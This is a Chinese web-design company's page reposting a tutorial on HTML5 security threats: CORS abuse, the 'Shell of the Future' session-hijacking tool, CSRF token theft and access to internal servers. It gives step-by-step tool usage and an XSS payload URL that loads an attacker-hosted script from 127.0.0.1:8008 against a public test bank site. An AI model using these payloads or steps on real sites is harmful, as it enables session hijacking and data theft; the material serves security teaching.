新聞中心
HTML5 是下一代的HTML,HTML5賦予網(wǎng)頁(yè)更好的意義和結(jié)構(gòu)。更加豐富的標(biāo)簽將隨著對(duì)RDFa的,微數(shù)據(jù)與微格式等方面的支持,構(gòu)建對(duì)程序、對(duì)用戶都更有價(jià)值的數(shù)據(jù)驅(qū)動(dòng)的Web?;贖TML5開(kāi)發(fā)的網(wǎng)頁(yè)APP擁有更短的啟動(dòng)時(shí)間,更快的聯(lián)網(wǎng)速度。本文詳細(xì)介紹了HTML5的普及,帶來(lái)的新的安全威脅。

創(chuàng)新互聯(lián)是一家專(zhuān)注于成都網(wǎng)站建設(shè)、成都網(wǎng)站制作與策劃設(shè)計(jì),嘉陵網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)做網(wǎng)站,專(zhuān)注于網(wǎng)站建設(shè)十載,網(wǎng)設(shè)計(jì)領(lǐng)域的專(zhuān)業(yè)建站公司;建站業(yè)務(wù)涵蓋:嘉陵等地區(qū)。嘉陵做網(wǎng)站價(jià)格咨詢:18982081108
一、CORS(Cross-Origin Resource Sharing) 跨域資源共享
為了構(gòu)建高品質(zhì)的網(wǎng)站,以及滿足日益增長(zhǎng)的用戶需求,HTML5針對(duì)SOP(同源策略)放寬了一些限制,簡(jiǎn)單的說(shuō),同源策略允許來(lái)自同一站點(diǎn)的頁(yè)面訪問(wèn)其頁(yè)面的方法和屬性等,但限制了跨域調(diào)用其他頁(yè)面的方法和屬性?,F(xiàn)在HTML5放寬了這些限制,XMLHttpRequest Level 2新增了功能CORS協(xié)議,允許Ajax發(fā)起跨域的請(qǐng)求,瀏覽器是可以發(fā)起跨域請(qǐng)求的,比如你可以外鏈一個(gè)外域的圖片或者腳本。但是Javascript腳本是不能獲取這些資源的內(nèi)容的,它只能被瀏覽器執(zhí)行或渲染。
COR是頁(yè)面層次的控制模式。每一個(gè)頁(yè)面需要返回一個(gè)名為‘Access-Control-Allow-Origin’的HTTP頭來(lái)允許外域的站點(diǎn)訪問(wèn)。你可以僅僅暴露有限的資源和有限的外域站點(diǎn)訪問(wèn)。在COR模式中,訪問(wèn)控制的職責(zé)可以放到頁(yè)面開(kāi)發(fā)者的手中,而不是服務(wù)器管理員。當(dāng)然頁(yè)面開(kāi)發(fā)者需要寫(xiě)專(zhuān)門(mén)的處理代碼來(lái)允許被外域訪問(wèn)。
所以只要b.com允許,a.com可以使用ajax獲取A上任意數(shù)據(jù),國(guó)外安全研究者Lava Kumar開(kāi)發(fā)了一款工具“Shell of the future”。
Shell of the Future 是一個(gè)反向Web Shell處理工具(Reverse Web Shell handler)。利用跨站腳本攻擊或?yàn)g覽器地址欄注入javascript以后,Shell of the Future可進(jìn)行劫持會(huì)話。 它利用了HTML5支持的Cross Origin Requests,可以繞過(guò)一些反會(huì)話劫持的方法,如HTTP-Only限制的cookie,幫定IP地址的會(huì)話ID。
下載地址
如何使用該工具:
1、下載并解壓該工具,雙擊“Shell of the Future.exe”,會(huì)彈出一個(gè)窗口。
2、輸入任意端口,點(diǎn)擊“Start”。
3、使用瀏覽器訪問(wèn)http://127.0.0.1:8008/sotf.console (firefox效果最佳)
4、不出問(wèn)題,你將看到以下畫(huà)面。(Shell of the Future有兩個(gè)JavaScript的exp- e1.js和e2.js,我們可以利用XSS漏洞將其嵌入到受害者的瀏覽器)
5、當(dāng)一個(gè)用戶登錄下面的測(cè)試網(wǎng)站:
http://www.testfire.net/bank/login.aspx (admin/admin)
該站點(diǎn)的搜索功能粗在一個(gè)XSS漏洞,http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E
6、攻擊者發(fā)送一個(gè)惡意鏈接給用戶,如下:
http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E
7、當(dāng)用戶點(diǎn)擊之后,攻擊者的IP地址將會(huì)發(fā)送給攻擊者,然后點(diǎn)擊“Hijack Session”:
8、點(diǎn)擊Hijack Session之后,將出現(xiàn)如下畫(huà)面:
#p#
二、竊取CSRF令牌(token)
目前很多互聯(lián)網(wǎng)站點(diǎn)都在使用token來(lái)防御CSRF攻擊,但是隨著HTML5技術(shù)的普及,攻擊者很有可能竊取到CSRF的token,如果CSRF token的請(qǐng)求URL(GET請(qǐng)求),利用前面提到的CORS協(xié)議,攻擊者可以注入一個(gè)CSRF payload跨域請(qǐng)求到目標(biāo)站點(diǎn)上。當(dāng)然,利用的話需要服務(wù)端添加一個(gè)HTTP 頭字段“origin”,并且需要設(shè)置該屬性withCredentials為true,讓我們來(lái)看看如何利用:
1、某用戶登錄www.bank.com。
2、假設(shè)該站點(diǎn)有CSRF保護(hù),即在表單提交的地方添加了隱藏的token,然后發(fā)送GET請(qǐng)求到服務(wù)端進(jìn)行驗(yàn)證,如下:
3、攻擊者通過(guò)email、IM聊天工具或其他方式發(fā)送一個(gè)惡意站點(diǎn)ww.attackersite.com4、攻擊者可以提交一個(gè)Ajax請(qǐng)求到www.bank.com并且執(zhí)行一些操作,但是需要知道CSRF的token值。5、所以攻擊者需要竊取到token令牌,然后進(jìn)行CSRF攻擊。
6、攻擊者編寫(xiě)了下面的一段代碼,發(fā)送Ajax請(qǐng)求到ConfirmTransfer.jsp頁(yè)面并接受其響應(yīng),在返回的數(shù)據(jù)包中搜索csrfToken,找到后,另外一個(gè)Ajax請(qǐng)求被發(fā)送,其中包含了CSRF token。
以上的一切操作全在后臺(tái)進(jìn)行,用戶完全不知情,因此,在HTML5中,攻擊者完全可能獲取到CSRF TOKEN和執(zhí)行一些操作。#p#
三、訪問(wèn)內(nèi)部服務(wù)器:
很多互聯(lián)網(wǎng)公司除了有ONLINE對(duì)外的業(yè)務(wù)之外,在內(nèi)部也用著很多的應(yīng)用,如財(cái)務(wù)管理系統(tǒng)、員工管理系統(tǒng)以及其他的一些內(nèi)部社區(qū)等,很多開(kāi)發(fā)者為了各個(gè)應(yīng)用之間調(diào)用簡(jiǎn)潔方便,在很多應(yīng)用中都添加了以下頭:
Control-Allow-Origin: *
攻擊者可以利用社會(huì)工程學(xué),讓內(nèi)部用戶點(diǎn)擊一個(gè)鏈接,然后攻擊者就可以訪問(wèn)到內(nèi)部的一些資源,以下為操作步驟:
1、員工登錄到內(nèi)部的某應(yīng)用,如www.internalurl.com
2、internalurl服務(wù)器返回的響應(yīng)頭設(shè)置了Access-Control-Allow-Origin: *(允許任何域發(fā)起的請(qǐng)求都可以獲取當(dāng)前服務(wù)器的數(shù)據(jù)。)
3、員工受到一封郵件,點(diǎn)擊了鏈接 – www.malicioussite.com
4、這個(gè)站點(diǎn)包含了正常的UI內(nèi)容,所以員工一般不會(huì)察覺(jué),但是,該頁(yè)面包含了一段javascript代碼。
5、該javascript代碼會(huì)發(fā)送一個(gè)XMLHttpRequest請(qǐng)求。
6、分析返回的數(shù)據(jù)包,并把它發(fā)送到攻擊者的服務(wù)器。
7、攻擊者獲取到公司內(nèi)部站點(diǎn)的相關(guān)信息。#p#
四、HTML5新的XSS攻擊載體
直到現(xiàn)在,還有很多開(kāi)發(fā)者總喜歡開(kāi)發(fā)自己定義的XSS黑名單過(guò)濾器,以阻止XSS攻擊,包含了大多網(wǎng)絡(luò)上常見(jiàn)的XSS利用的代碼,如img、script等,HTML5中引入了很多新的標(biāo)簽屬性,如audio和vedio標(biāo)簽,新的標(biāo)簽帶來(lái)了新的事件,會(huì)繞過(guò)現(xiàn)有的過(guò)濾器,以下為收集的HTML5存在跨站的標(biāo)簽:


咨詢
建站咨詢
